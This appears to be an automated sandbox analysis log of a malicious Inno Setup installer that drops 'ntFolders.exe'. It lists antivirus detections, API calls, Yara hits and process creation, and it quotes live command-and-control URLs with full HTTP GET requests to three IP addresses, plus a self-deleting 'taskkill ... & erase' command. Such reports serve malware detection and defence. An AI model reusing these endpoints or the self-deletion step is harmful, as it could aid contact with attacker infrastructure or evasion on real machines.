Source: 0.0.file.exe.400000.0.unpack |
Avira: Label: TR/Crypt.XPACK.Gen2 |
Source: 0.3.file.exe.2118000.4.unpack |
Avira: Label: TR/Patched.Ren.Gen |
Source: 0.2.file.exe.400000.0.unpack |
Avira: Label: TR/Crypt.XPACK.Gen2 |
Source: 2.2.ntFolders.exe.10000000.6.unpack |
Avira: Label: TR/Crypt.XPACK.Gen8 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_10001000 ISCryptGetVersion, |
1_2_10001000 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_10001130 ArcFourCrypt, |
1_2_10001130 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy, |
2_2_00403770 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0046C770 FindFirstFileA,FindNextFileA,FindClose, |
1_2_0046C770 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00474708 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, |
1_2_00474708 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00451554 FindFirstFileA,GetLastError, |
1_2_00451554 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0048A778 FindFirstFileA,6D7069D0,FindNextFileA,FindClose, |
1_2_0048A778 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_004729D4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, |
1_2_004729D4 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0045CA54 FindFirstFileA,FindNextFileA,FindClose, |
1_2_0045CA54 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00406FEC FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, |
1_2_00406FEC |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0045DB60 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, |
1_2_0045DB60 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0045DEF4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, |
1_2_0045DEF4 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer, |
2_2_00404490 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00423E2D FindFirstFileExW, |
2_2_00423E2D |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_1000959D FindFirstFileExW, |
2_2_1000959D |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.139.105.171 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.139.105.171 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.139.105.171 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.139.105.171 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: ntFolders.exe, 00000002.00000002.394014970.0000000001844000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://107.182.129.235/storage/extension.php |
Source: ntFolders.exe, 00000002.00000002.394014970.0000000001844000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://107.182.129.235/storage/ping.php |
Source: ntFolders.exe, 00000002.00000002.394014970.0000000001844000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://171.22.30.106/library.php |
Source: ntFolders.exe, 00000002.00000002.394014970.0000000001844000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://171.22.30.106/library.phpH |
Source: ntFolders.exe, 00000002.00000002.394014970.0000000001844000.00000004.00000020.00020000.00000000.sdmp, ntFolders.exe, 00000002.00000002.394139951.000000000187A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte |
Source: file.exe |
String found in binary or memory: http://www.innosetup.com |
Source: is-I19BM.tmp, is-I19BM.tmp, 00000001.00000000.306831625.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-I19BM.tmp.0.dr, is-K96P8.tmp.1.dr |
String found in binary or memory: http://www.innosetup.com/ |
Source: file.exe, 00000000.00000003.306222785.0000000002200000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.306408655.0000000002118000.00000004.00001000.00020000.00000000.sdmp, is-I19BM.tmp, 00000001.00000002.395161258.00000000004BC000.00000002.00000001.01000000.00000004.sdmp, is-I19BM.tmp.0.dr, is-K96P8.tmp.1.dr |
String found in binary or memory: http://www.innosetup.comDVarFileInfo$ |
Source: file.exe, 00000000.00000003.306222785.0000000002200000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.306408655.0000000002118000.00000004.00001000.00020000.00000000.sdmp, is-I19BM.tmp, is-I19BM.tmp, 00000001.00000000.306831625.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-I19BM.tmp.0.dr, is-K96P8.tmp.1.dr |
String found in binary or memory: http://www.remobjects.com/?ps |
Source: file.exe, 00000000.00000003.306222785.0000000002200000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.306408655.0000000002118000.00000004.00001000.00020000.00000000.sdmp, is-I19BM.tmp, 00000001.00000000.306831625.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-I19BM.tmp.0.dr, is-K96P8.tmp.1.dr |
String found in binary or memory: http://www.remobjects.com/?psU |
Source: global traffic |
HTTP traffic detected: GET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 45.139.105.171Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /storage/ping.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 0Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /storage/extension.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: Yara match |
File source: 2.2.ntFolders.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.2.ntFolders.exe.3160000.4.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.2.ntFolders.exe.3160000.4.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.2.ntFolders.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000002.00000002.393868626.0000000001740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.393249857.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.394218193.0000000003160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004081C8 |
0_2_004081C8 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00468940 |
1_2_00468940 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00460F30 |
1_2_00460F30 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0043DF70 |
1_2_0043DF70 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_004303A4 |
1_2_004303A4 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0047A6D8 |
1_2_0047A6D8 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_004446E8 |
1_2_004446E8 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00434994 |
1_2_00434994 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0045AA90 |
1_2_0045AA90 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00480BDC |
1_2_00480BDC |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00444C90 |
1_2_00444C90 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00462F38 |
1_2_00462F38 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00445388 |
1_2_00445388 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00435698 |
1_2_00435698 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00445794 |
1_2_00445794 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_0042F948 |
1_2_0042F948 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00457BB4 |
1_2_00457BB4 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00404490 |
2_2_00404490 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_004096F0 |
2_2_004096F0 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_004056A0 |
2_2_004056A0 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00406800 |
2_2_00406800 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00406AA0 |
2_2_00406AA0 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00404D40 |
2_2_00404D40 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00405F40 |
2_2_00405F40 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00402F20 |
2_2_00402F20 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_004150D3 |
2_2_004150D3 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00415305 |
2_2_00415305 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_004223A9 |
2_2_004223A9 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00419510 |
2_2_00419510 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00404840 |
2_2_00404840 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00426850 |
2_2_00426850 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00410A50 |
2_2_00410A50 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_0042AB9A |
2_2_0042AB9A |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00421C88 |
2_2_00421C88 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_0042ACBA |
2_2_0042ACBA |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00447D2D |
2_2_00447D2D |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00428D39 |
2_2_00428D39 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_00404F20 |
2_2_00404F20 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_1000F670 |
2_2_1000F670 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: 2_2_1000EC61 |
2_2_1000EC61 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: String function: 004035DC appears 90 times |
|
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: String function: 00403548 appears 61 times |
|
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: String function: 00407B08 appears 33 times |
|
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: String function: 00445FF4 appears 43 times |
|
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: String function: 00455A04 appears 49 times |
|
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: String function: 004037CC appears 193 times |
|
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: String function: 00405AA4 appears 92 times |
|
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: String function: 00455814 appears 86 times |
|
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: String function: 004462C4 appears 58 times |
|
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: String function: 004348AC appears 32 times |
|
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: String function: 00451AFC appears 62 times |
|
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: String function: 00408DF0 appears 42 times |
|
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: String function: 10003C50 appears 34 times |
|
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Code function: String function: 0040F9E0 appears 54 times |
|
Source: is-I19BM.tmp.0.dr |
Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows |
Source: is-I19BM.tmp.0.dr |
Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows |
Source: is-I19BM.tmp.0.dr |
Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows |
Source: is-K96P8.tmp.1.dr |
Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows |
Source: is-K96P8.tmp.1.dr |
Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows |
Source: is-K96P8.tmp.1.dr |
Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows |
Source: file.exe, 00000000.00000003.306222785.0000000002200000.00000004.00001000.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe |
Source: file.exe, 00000000.00000003.306222785.0000000002200000.00000004.00001000.00020000.00000000.sdmp |
Binary or memory string: OriginalFilename6 vs file.exe |
Source: file.exe, 00000000.00000000.305692501.0000000000410000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilename" vs file.exe |
Source: file.exe, 00000000.00000003.306408655.0000000002118000.00000004.00001000.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe |
Source: file.exe, 00000000.00000003.306408655.0000000002118000.00000004.00001000.00020000.00000000.sdmp |
Binary or memory string: OriginalFilename6 vs file.exe |
Source: file.exe |
Binary or memory string: OriginalFilename" vs file.exe |
Source: unknown |
Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe |
|
Source: C:\Users\user\Desktop\file.exe |
Process created: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp "C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp" /SL4 $30366 "C:\Users\user\Desktop\file.exe" 2214542 96256 |
|
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process created: C:\Program Files (x86)\PrintFolders\ntFolders.exe "C:\Program Files (x86)\PrintFolders\ntFolders.exe" |
|
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\karcA17.exe |
|
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "ntFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\ntFolders.exe" & exit |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "ntFolders.exe" /f |
|
Source: C:\Users\user\Desktop\file.exe |
Process created: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp "C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp" /SL4 $30366 "C:\Users\user\Desktop\file.exe" 2214542 96256 |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Process created: C:\Program Files (x86)\PrintFolders\ntFolders.exe "C:\Program Files (x86)\PrintFolders\ntFolders.exe" |
Jump to behavior |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\karcA17.exe |
Jump to behavior |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe |
Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "ntFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\ntFolders.exe" & exit |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "ntFolders.exe" /f |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00408F74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6DB74E70, |
0_2_00408F74 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00453A8C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6DB74E70, |
1_2_00453A8C |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00406584 push 004065C1h; ret |
0_2_004065B9 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00404159 push eax; ret |
0_2_00404195 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00404229 push 00404435h; ret |
0_2_0040442D |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00407E84 push ecx; mov dword ptr [esp], eax |
0_2_00407E89 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004042AA push 00404435h; ret |
0_2_0040442D |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00408B24 push 00408B57h; ret |
0_2_00408B4F |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00404327 push 00404435h; ret |
0_2_0040442D |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0040438C push 00404435h; ret |
0_2_0040442D |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
Code function: 1_2_00409B70 push 00409BADh; ret |
1_2_00409BA5 |
Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp |
